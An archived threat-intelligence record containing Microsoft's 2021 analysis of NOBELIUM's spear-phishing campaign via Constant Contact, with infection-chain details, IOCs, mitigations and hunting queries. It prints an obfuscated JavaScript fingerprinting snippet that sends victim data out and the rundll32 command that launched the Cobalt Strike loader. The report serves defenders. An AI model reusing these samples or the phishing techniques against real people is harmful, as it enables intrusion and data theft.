{ "id": "445d7ac5-3291-4b35-b2d1-a9379c7add3d", "created_at": "2026-04-06T00:13:29.342779Z", "updated_at": "2026-04-10T03:37:32.847452Z", "deleted_at": null, "sha1_hash": "0ba1f2de8fff45674c76ba94ef6f45916cb02838", "title": "New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 325277, "plain_text": "New sophisticated email-based attack from NOBELIUM | Microsoft\r\nSecurity Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2021-05-28 · Archived: 2026-04-05 13:25:32 UTC\r\nMicrosoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by\r\nNOBELIUM, the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP\r\nmalware, GoldMax malware, and other related components. The campaign, initially observed and tracked by Microsoft\r\nsince January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the\r\ncampaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, Constant Contact, to masquerade as a\r\nUS-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.\r\nMicrosoft is issuing this alert and new security research regarding this sophisticated email-based campaign that\r\nNOBELIUM has been operating to help the industry understand and protect from this latest activity. Below, we have\r\noutlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more\r\ninformation on the Microsoft On The Issues blog.\r\nNote: This is an active incident. We will post more details here as they become available.\r\nUpdate [05/28/2021]: We published a new blog post detailing NOBELIUM’s latest early-stage toolset, composed\r\nof four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage. \r\nNOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks,\r\nmilitary, IT service providers, health technology and research, and telecommunications providers. With this latest attack,\r\nNOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing\r\nan established pattern of using unique infrastructure and tooling for each target, increasing their ability to remain undetected\r\nfor a longer period of time.\r\nThis new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were\r\nobscured behind the mailing service’s URL (many email and document services provide a mechanism to simplify the\r\nsharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this\r\ncampaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam.\r\nHowever, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients\r\neither due to configuration and policy settings or prior to detections being in place.\r\nMicrosoft 365 Defender delivers coordinated defense against this threat. Microsoft Defender for Office 365 detects the\r\nmalicious emails, and Microsoft Defender for Endpoint detects the malware and malicious behaviors. Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor\r\ncommunications matching characteristics described in this report and take the actions described below in this article.\r\nWe continue to see an increase in sophisticated and nation-state-sponsored attacks and, as part of our ongoing threat research\r\nand efforts to protect customers, we will continue to provide guidance to the security community on how to secure against\r\nand respond to these multi-dimensional attacks.\r\nSpear-phishing campaign delivers NOBELIUM payloads\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 1 of 10\n\nThe NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM\r\noperations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion\r\nplatform. It is likely that these observations represent changes in the actor’s tradecraft and possible experimentation\r\nfollowing widespread disclosures of previous incidents. \r\nEarly testing and initial discovery\r\nAs part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the\r\nGoogle Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record\r\nattributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was\r\nseemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to\r\nrecord targets who clicked. No delivery of a malicious payload was observed during this early activity.\r\nEvolving delivery techniques\r\nIn the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML\r\nfile attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file\r\nto disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive.\r\nFrom here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon\r\nexecuting on the system.\r\nFigure 1. Example Flow of HMTL/ISO infection chain.\r\nHere’s an example of target fingerprinting code leveraging Firebase:\r\ntry {\r\nlet sdfgfghj = '';\r\nlet kjhyui = new XMLHttpRequest();\r\nkjhyui.onreadystatechange = function (){\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 2 of 10\n\nsdfgfghj = this.responseText;\r\n}\r\nkjhyui.send(null);\r\nlet ioiolertsfsd = navigator.userAgent;\r\nlet uyio = window.location.pathname.replace('/','');\r\nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj};\r\nctryur = JSON.stringify(ctryur);\r\nlet sdfghfgh = new XMLHttpRequest();\r\nsdfghfgh.setRequestHeader('Content-Type', 'application/json');\r\nsdfghfgh.send(ctryur);\r\n} catch (e) {}\r\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several\r\nalterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor\r\nexperimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the\r\nactor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious\r\nCobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying\r\nHTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from\r\nwhere the ISO was distributed.\r\nThe phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted\r\nwaves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web\r\nserver after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server\r\nunder NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.\r\nEscalated targeting and delivery\r\nExperimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the\r\nactor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode\r\nthe ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of\r\nthe api.ipify.org service. The actor sometimes employed checks for specific internal Active Directory domains that would\r\nterminate execution of the malicious process if it identified an unintended environment.\r\nIn May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a\r\ncustom .NET first-stage implant, detected as TrojanDownloader:MSIL/BoomBox, that reported host-based reconnaissance\r\ndata to, and downloaded additional payloads from, the Dropbox cloud storage platform.\r\nOn May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact,\r\nNOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems\r\nmight have successfully delivered some of the earlier emails to recipients.\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 3 of 10\n\nIn the May 25 campaign, there were several iterations. In one example the emails appear to originate from\r\nUSAID \u003cashainfo@usaid.gov\u003e, while having an authentic sender email address that matches the standard Constant Contact\r\nservice. This address (which varies for each recipient) ends in @in.constantcontact.com, and (which varies for each\r\nrecipient), and a Reply-To address of \u003cmhillary@usaid.gov\u003e was observed. The emails pose as an alert from USAID, as\r\nseen below.\r\nFigure 2. Example email screenshot.\r\nIf the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service, which follows this\r\npattern:\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 4 of 10\n\nhttps://r20.rs6[.]net/tn.jsp?f=\r\nThe user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:\r\nA malicious ISO file is then delivered to the system. Within this ISO file are the following files that are saved in\r\nthe %USER%AppDataLocalTemp\u003crandom folder name\u003e path:\r\nA shortcut, such as Reports.lnk, that executes a custom Cobalt Strike Beacon loader\r\nA decoy document, such as ica-declass.pdf, that is displayed to the target\r\nA DLL, such as Document.dll, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft\r\nFigure 3. ISO file contents. It is worth noting that the “Documents.dll” is a hidden file.\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 5 of 10\n\nFigure 4. Shortcut which executes the hidden DLL file.\r\nThe end result when detonating the LNK file is the execution of “C:Windowssystem32rundll32.exe Documents.dll,Open”.\r\nThe successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised systems.\r\nThen, the successful execution of these malicious payloads could enable NOBELIUM to conduct action-on objectives, such\r\nas lateral movement, data exfiltration, and delivery of additional malware.\r\nIndicators of compromise (IOCs) for the campaign occurring on May 25 are provided in this blog to help security teams to\r\nidentify actor activity.\r\nMicrosoft security researchers assess that the NOBELIUM’s spear-phishing operations are recurring and have increased in\r\nfrequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of\r\ntactics.\r\nMicrosoft continues to monitor this threat actor’s evolving activities and will update as necessary. Microsoft 365\r\nDefender protects customers against the multiple components of this threat: malicious emails, file attachments, connections,\r\nmalware payloads, other malicious artifacts, and attacker behavior. Refer to the detection details below for specific detection\r\nnames and alerts. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate\r\nvariants of actor activity.\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 6 of 10\n\nMitigations\r\nApply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of\r\nmonitored mitigations.\r\nTurn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to\r\ncover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge\r\nmajority of new and unknown variants.\r\nRun EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR\r\nin block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)\r\nEnable network protection to prevent applications or users from accessing malicious domains and other malicious\r\ncontent on the internet.\r\nEnable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take\r\nimmediate action on alerts to resolve breaches, significantly reducing alert volume.\r\nUse device discovery to increase your visibility into your network by finding unmanaged devices on your network\r\nand onboarding them to Microsoft Defender for Endpoint.\r\nEnable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all\r\ncustomers download and use passwordless solutions like Microsoft Authenticator to secure your accounts.\r\nFor Office 365 users, see multifactor authentication support.\r\nFor Consumer and Personal email accounts, see how to use two-step verification.\r\nTurn on the following attack surface reduction rule to block or audit activity associated with this threat: Block all\r\nOffice applications from creating child processes. NOTE: Assess rule impact before deployment.\r\nIndicators of compromise (IOC)\r\nThis attack is still active, so these indicators should not be considered exhaustive for this observed activity. These indicators\r\nof compromise are from the large-scale campaign launched on May 25, 2021.\r\nINDICATOR TYPE DESCRIPTION\r\nashainfo@usaid.gov Email Spoofed email account\r\nmhillary@usaid.gov Email Spoofed email account\r\n2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252\r\nSHA-256Malicious ISO file\r\n(container)\r\nd035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142\r\nSHA-256Malicious ISO file\r\n(container)\r\n94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916\r\nSHA-256Malicious ISO file\r\n(container)\r\n48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0\r\nSHA-256\r\nMalicious shortcut (LNK)\r\nee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c\r\nSHA-256Cobalt Strike Beacon\r\nmalware\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 7 of 10\n\nee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330\r\nSHA-256Cobalt Strike Beacon\r\nmalware\r\nusaid.theyardservice[.]com Domain\r\nSubdomain used to\r\ndistribute ISO file\r\nworldhomeoutlet[.]com Domain\r\nSubdomain in Cobalt\r\nStrike C2\r\ndataplane.theyardservice[.]com Domain\r\nSubdomain in Cobalt\r\nStrike C2\r\ncdn.theyardservice[.]com Domain\r\nSubdomain in Cobalt\r\nStrike C2\r\nstatic.theyardservice[.]com Domain\r\nSubdomain in Cobalt\r\nStrike C2\r\n192[.]99[.]221[.]77\r\nIP\r\naddress\r\nIP resolved to\r\nby worldhomeoutlet[.]com\r\n83[.]171[.]237[.]173\r\nIP\r\naddress\r\nIP resolved to by\r\n*theyardservice[.]com\r\ntheyardservice[.]com Domain Actor controlled domain\r\nDetection details\r\nAntivirus\r\nMicrosoft Defender Antivirus detects threat components as the following malware:\r\nTrojan:Win32/NativeZone.C!dha\r\nEndpoint detection and response (EDR)\r\nAlerts with the following titles in the Security Center can indicate threat activity on your network:\r\nMalicious ISO File used by NOBELIUM\r\nCobalt Strike Beacon used by NOBELIUM\r\nCobalt Strike network infrastructure used by NOBELIUM\r\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by\r\nunrelated threat activity and are not monitored in the status cards provided with this report.\r\nAn uncommon file was created and added to startup folder.\r\nA link file (LNK) with unusual characteristics was opened.\r\nAdvanced hunting\r\nMicrosoft 365 Defender\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 8 of 10\n\nNOTE: The following sample queries lets you search for a week’s worth of events. To explore up to 30 days’ worth of raw\r\ndata to inspect events in your network and locate potential NOBELIUM mass email-related indicators for more than a week,\r\ngo to the Advanced Hunting page \u003e Query tab, select the calendar drop-down menu to update your query to hunt for\r\nthe Last 30 days.\r\nTo locate possible exploitation activity, run the following query in the Microsoft 365 security center:\r\nNOBELIUM abuse of USAID Constant Contact resources in email data\r\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and\r\nspecifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. Run\r\nquery in Microsoft 365 security center.\r\nEmailUrlInfo\r\n| where UrlDomain == \"r20.rs6.net\"\r\n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId\r\n| where SenderMailFromDomain == \"in.constantcontact.com\"\r\n| where SenderFromDomain == \"usaid.gov\"\r\nNOBELIUM subject lines used in abuse of Constant Contact service\r\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and\r\nspecifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. It also\r\nspecifies email subject keywords seen in phishing campaigns in late May using the term “Special Alert!” in various ways in\r\nthe subject. Run query in Microsoft 365 security center.\r\nletSubjectTerms=pack_array(\"Special\",\"Alert\");\r\nEmailUrlInfo\r\n|whereUrlDomain==\"r20.rs6.net\"\r\n|joinkind=innerEmailEventson$left.NetworkMessageId==$right.NetworkMessageId\r\n|whereSenderMailFromDomain==\"in.constantcontact.com\"\r\n|whereSenderFromDomain==\"usaid.gov\"\r\n|whereSubjecthas_any(SubjectTerms)\r\nAzure Sentinel\r\nNOBELIUM exploitation search using Azure Sentinel\r\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators\r\nin this GitHub repository.\r\nMITRE ATT\u0026CK techniques observed\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 9 of 10\n\nThis threat makes use of attacker techniques documented in the MITRE ATT\u0026CK framework.\r\nInitial access\r\nT1566.003 Phishing: Spearphishing via Service—NOBELIUM used the legitimate mass mailing service, Constant\r\nContact to send their emails.\r\nT1566.002  Phishing: Spearphishing Link—The emails sent by NOBELIUM includes a URL that directs a user to the\r\nlegitimate Constant Contact service that redirects to NOBELIUM-controlled infrastructure.\r\nExecution\r\nT1610 Deploy Container—Payload is delivered via an ISO file which is mounted on target computers.\r\nT1204.001 User Execution: Malicious Link—Cobalt Strike Beacon payload is executed via a malicious link (LNK)\r\nfile.\r\nCommand and control\r\nT1071.001 Application Layer Protocol: Web Protocols—Cobalt Strike Beacons call out to attacker infrastructure via\r\nport 443.\r\nLearn more\r\nTo learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert\r\ncoverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.\r\nSource: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "references": [ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" ], "report_names": [ "new-sophisticated-email-based-attack-from-nobelium" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434409, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0ba1f2de8fff45674c76ba94ef6f45916cb02838.pdf", "text": "https://archive.orkl.eu/0ba1f2de8fff45674c76ba94ef6f45916cb02838.txt", "img": "https://archive.orkl.eu/0ba1f2de8fff45674c76ba94ef6f45916cb02838.jpg" } }